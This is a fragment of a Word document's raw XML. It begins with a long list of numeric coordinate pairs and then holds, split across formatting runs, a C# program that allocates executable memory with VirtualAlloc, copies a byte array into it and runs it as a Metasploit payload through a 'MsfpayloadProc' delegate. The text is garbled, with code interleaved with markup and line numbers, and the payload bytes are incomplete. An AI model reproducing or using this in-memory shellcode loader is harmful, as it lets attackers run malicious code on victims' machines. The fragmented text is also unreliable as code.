0,5067,12633,5067,12636,5067,12639,5067,12642,5067,12645,5067,12648,5067,12652,5067,12655,5067,12658,5067,12662,5067,12666,5067,12669,5067,12673,5067,12677,5067,12681,5067,12685,5067,12689,5067,12693,5067,12698,5067,12702,5067,12707,5067,12711,5067,12716,5067,12721,5067,12726,5067,12731,5067,12736,5067,12741,5067,12746,5067,12751,5067,12757,5067,12762,5067,12768,5067,12774,5067,12780,5067,12786,5067,12792,5067,12798,5067,12804,5067,12810,5067,12810,5067,12810,5067,12810,5067,12810,5067,12810,5067,12810,5067,12810,5067,12810,5067,12810,5067,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5066,12810,5065,12810,5065,12810,5065,12810,5065,12810,5065,12810,5065,12810,5064,12810,5064,12810,5064,12810,5064,12810,5063,12810,5063,12810,5063,12810,5063,12810,5062,12810,5062,12810,5062,12810,5061,12810,5061,12810,5060,12810,5060,12810,5060,12810,5059,12810,5059,12810,5058,12810,5058,12810,5057,12810,5057,12810,5056,12810,5055,12810,5055,12810,5054,12810,5053,12810,5053,12810,5052,12810,5051,12810,5050,12810,5050,12810,5049,12810,5048,12810,5047,12810,5046,12810,5045,12810,5044,12810,5043,12810,5042,12810,5041,12810,5040,12810,5039,12810,5038,12810,5036,12810,5035,12810,5034,12810,5033,12810,5031,12810,5030,12810,5029,12810,5027,12810,5026,12810,5024,12810,5023,12810,5021,12810,5020,12810,5018,12810,5016,12810,5015,12810,5013,12810,5011,12810,5009,12810,5007,12810,5005,12810,5004,12810,5002,12810,4999,12810,4997,12810,4995,12810,4993,12810,4991,12810,4989,12810,4986,12810,4984,12810,4982,12810,4979,12810,4977,12810,4974,12810,4972,12810,4969,12810,4966,12810,4964,12810,4961,12810,4958,12810,4955,12810,4952,12810,4949,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12810,4946,12809,4946,12809,4946,12809,4946,12809,4946,12809,4946,12808,4946,12808,4946,12808,4946,12807,4946,12807,4946,12807,4946,12806,4946,12806,4946,12805,4946,12805,4946,12804,4946,12804,4946,12803,4946,12803,4946,12802,4946,12801,4946,12801,4946,12800,4946,12799,4946,12798,4946,12798,4946,12797,4946,12796,4946,12795,4946,12794,4946,12793,4946,12792,4946,12790,4946,12789,4946,12788,4946,12787,4946,12785,4946,12784,4946,12782,4946,12781,4946,12779,4946,12778,4946,12776,4946,12774,4946,12773,4946,12771,4946,12769,4946,12767,4946,12765,4946,12763,4946,12761,4946,12759,4946,12756,4946,12754,4946,12752,4946,12749,4946,12747,4946,12744,4946,12741,4946,12739,4946,12736,4946,12733,4946,12730,4946,12727,4946,12724,4946,12721,4946,12717,4946,12714,4946,12711,4946,12707,4946,12704,4946,12700,4946,12696,4946,12693,4946,12689,4946,12685,4946,12681,4946,12677,4946,12672,4946,12668,4946,12664,4946,12659,4946,12654,4946,12650,4946,12645,4946,12640,4946,12635,4946,12630,4946,12625,4946,12620,4946,12614,4946,12609,4946,12603,4946,12598,4946,12592,4946,12586,4946,12580,4946,12574,4946,12568,4946,12562,4946,12555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1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0xbf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0x9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e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115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0xa0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0x7f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0xfb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0x6e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0xd9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1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}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handle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Zero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44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handle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VirtualAlloc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Zero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codeBytes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47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MEM_COMMIT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|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MEM_RESERVE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PAGE_EXECUTE_READWRITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="1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try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50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Marshal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Copy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codeBytes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handle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codeBytes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MsfpayloadProc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msfpayload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3980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Marshal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GetDelegateForFunctionPointer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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handle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typeof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MsfpayloadProc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as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MsfpayloadProc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54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msfpayload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55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56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finally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57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VirtualFree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handle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MEM_RELEASE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59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60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"Kernel32.dll"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EntryPoint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"VirtualAlloc"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62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VirtualAlloc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int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size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nt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allocType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protect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"Kernel32.dll"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EntryPoint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"VirtualFree"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45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64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bool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VirtualFree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int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size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freeType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65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const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MEM_COMMIT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0x1000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66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const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MEM_RESERVE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0x2000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67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const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PAGE_EXECUTE_READWRITE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68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const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MEM_RELEASE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0x8000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69</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="91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script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0" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/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